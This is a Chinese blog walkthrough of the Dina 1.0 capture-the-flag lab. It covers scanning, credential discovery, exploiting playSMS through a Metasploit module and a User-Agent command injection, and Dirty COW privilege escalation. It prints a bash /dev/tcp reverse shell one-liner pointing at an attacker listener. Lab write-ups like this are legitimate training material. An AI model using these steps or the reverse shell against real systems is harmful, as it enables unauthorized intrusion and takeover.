靶机实战-Dina 1.0

2023-11-10 08:12
文章标签 实战 1.0 靶机 dina

本文主要是介绍靶机实战-Dina 1.0,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

Dina 1.0靶机实战

文章目录

    • Dina 1.0靶机实战
    • 1、主机发现
    • 2、端口扫描
    • 3、端口详细信息扫描
    • 4、访问80端口--http服务
    • 5、提权
    • 提权方式二

1、主机发现

在这里插入图片描述
目标IP:192.168.232.157

2、端口扫描

在这里插入图片描述

3、端口详细信息扫描

在这里插入图片描述
只开放80端口

4、访问80端口–http服务

主页啥都没有,直接dirb扫一下目录
在这里插入图片描述
依次访问目录:
在这里插入图片描述
index就是主页,就不看了
发现robot中有五个目录:
在这里插入图片描述
依次访问:
在这里插入图片描述
在这里插入图片描述
其它两个页面跟第一个一样
继续访问:
//在/secure中发现一个zip文件而且可以下载
在这里插入图片描述
下载backup.zip文件,解压发现需要密码
在这里插入图片描述
不知道密码,先pass,去网页源码里看看有没有东西
发现http://192.168.10.181/nothing/源码中有记录密码
在这里插入图片描述
尝试用得到的密码解压,用密码freedom成功解压,解压发现是一个类似mp3的文件
在这里插入图片描述
在这里插入图片描述
用播放器打不开
在这里插入图片描述
用记事本打开:
在这里插入图片描述
发现url :/SecreTSMSgatwayLogin //Login?猜测是登录页面
在这里插入图片描述
果然是,然后尝试使用文件中的用户名touhid,密码freedom登录
在这里插入图片描述
在这里插入图片描述
不对?!,继续依次尝试在nothing源码中找到的密码
在这里插入图片描述
在这里插入图片描述
diana登录成功

在进入后台后,发现是playSMS,可通过metasploit查看相关漏洞看能否利用
在这里插入图片描述
使用use exploit/multi/http/playsms_filename_exec 进行漏洞利用
在这里插入图片描述
添加渗透攻击模块中的参数
在这里插入图片描述
exploit执行后成功,获取meterpreter权限
//上面两个exploit都可以获得meterpreter权限

5、提权

//查看内核版本,用脏牛提权
在这里插入图片描述
编译and执行:
在这里插入图片描述
在这里插入图片描述
提权成功

提权方式二

在网页中发现文件上传,并发现要求上传CSV文件:
在这里插入图片描述
但不知道文件上传后的路径在哪,所以文件上传漏洞没法使用
用searchsploit命令查询后门文件:
在这里插入图片描述
发现本页面后门文件42044.txt,查看其内容
在这里插入图片描述
根据文件所说,将命令写入表格:
在这里插入图片描述
去页面进行文件上传并抓包:
在这里插入图片描述
根据文件中提示,将user-agent修改为想要执行的命令,发现成功执行
在这里插入图片描述
利用此命令执行漏洞,进行反弹shell:
echo “bash -i>&/dev/tcp/192.168.232.130/1234 0>&1” | bash
在这里插入图片描述
点击GO,查看kali//kali提权开启监听
在这里插入图片描述
拿到shell,接下来提权
利用脏牛提权://下载dirty.c
因为上面已经用过脏牛提权,重新做的话要删除,重来,所以就不再做了
在这里插入图片描述
在这里插入图片描述

这篇关于靶机实战-Dina 1.0的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/381433

相关文章

精选20个好玩又实用的的Python实战项目(有图文代码)

《精选20个好玩又实用的的Python实战项目(有图文代码)》文章介绍了20个实用Python项目,涵盖游戏开发、工具应用、图像处理、机器学习等,使用Tkinter、PIL、OpenCV、Kivy等库... 目录① 猜字游戏② 闹钟③ 骰子模拟器④ 二维码⑤ 语言检测⑥ 加密和解密⑦ URL缩短⑧ 音乐播放

SQL Server跟踪自动统计信息更新实战指南

《SQLServer跟踪自动统计信息更新实战指南》本文详解SQLServer自动统计信息更新的跟踪方法,推荐使用扩展事件实时捕获更新操作及详细信息,同时结合系统视图快速检查统计信息状态,重点强调修... 目录SQL Server 如何跟踪自动统计信息更新:深入解析与实战指南 核心跟踪方法1️⃣ 利用系统目录

java中pdf模版填充表单踩坑实战记录(itextPdf、openPdf、pdfbox)

《java中pdf模版填充表单踩坑实战记录(itextPdf、openPdf、pdfbox)》:本文主要介绍java中pdf模版填充表单踩坑的相关资料,OpenPDF、iText、PDFBox是三... 目录准备Pdf模版方法1:itextpdf7填充表单(1)加入依赖(2)代码(3)遇到的问题方法2:pd

PyTorch中的词嵌入层(nn.Embedding)详解与实战应用示例

《PyTorch中的词嵌入层(nn.Embedding)详解与实战应用示例》词嵌入解决NLP维度灾难,捕捉语义关系,PyTorch的nn.Embedding模块提供灵活实现,支持参数配置、预训练及变长... 目录一、词嵌入(Word Embedding)简介为什么需要词嵌入?二、PyTorch中的nn.Em

在IntelliJ IDEA中高效运行与调试Spring Boot项目的实战步骤

《在IntelliJIDEA中高效运行与调试SpringBoot项目的实战步骤》本章详解SpringBoot项目导入IntelliJIDEA的流程,教授运行与调试技巧,包括断点设置与变量查看,奠定... 目录引言:为良驹配上好鞍一、为何选择IntelliJ IDEA?二、实战:导入并运行你的第一个项目步骤1

Spring Boot3.0新特性全面解析与应用实战

《SpringBoot3.0新特性全面解析与应用实战》SpringBoot3.0作为Spring生态系统的一个重要里程碑,带来了众多令人兴奋的新特性和改进,本文将深入解析SpringBoot3.0的... 目录核心变化概览Java版本要求提升迁移至Jakarta EE重要新特性详解1. Native Ima

Spring Boot 与微服务入门实战详细总结

《SpringBoot与微服务入门实战详细总结》本文讲解SpringBoot框架的核心特性如快速构建、自动配置、零XML与微服务架构的定义、演进及优缺点,涵盖开发环境准备和HelloWorld实战... 目录一、Spring Boot 核心概述二、微服务架构详解1. 微服务的定义与演进2. 微服务的优缺点三

SpringBoot集成MyBatis实现SQL拦截器的实战指南

《SpringBoot集成MyBatis实现SQL拦截器的实战指南》这篇文章主要为大家详细介绍了SpringBoot集成MyBatis实现SQL拦截器的相关知识,文中的示例代码讲解详细,有需要的小伙伴... 目录一、为什么需要SQL拦截器?二、MyBATis拦截器基础2.1 核心接口:Interceptor

从入门到进阶讲解Python自动化Playwright实战指南

《从入门到进阶讲解Python自动化Playwright实战指南》Playwright是针对Python语言的纯自动化工具,它可以通过单个API自动执行Chromium,Firefox和WebKit... 目录Playwright 简介核心优势安装步骤观点与案例结合Playwright 核心功能从零开始学习

Java docx4j高效处理Word文档的实战指南

《Javadocx4j高效处理Word文档的实战指南》对于需要在Java应用程序中生成、修改或处理Word文档的开发者来说,docx4j是一个强大而专业的选择,下面我们就来看看docx4j的具体使用... 目录引言一、环境准备与基础配置1.1 Maven依赖配置1.2 初始化测试类二、增强版文档操作示例2.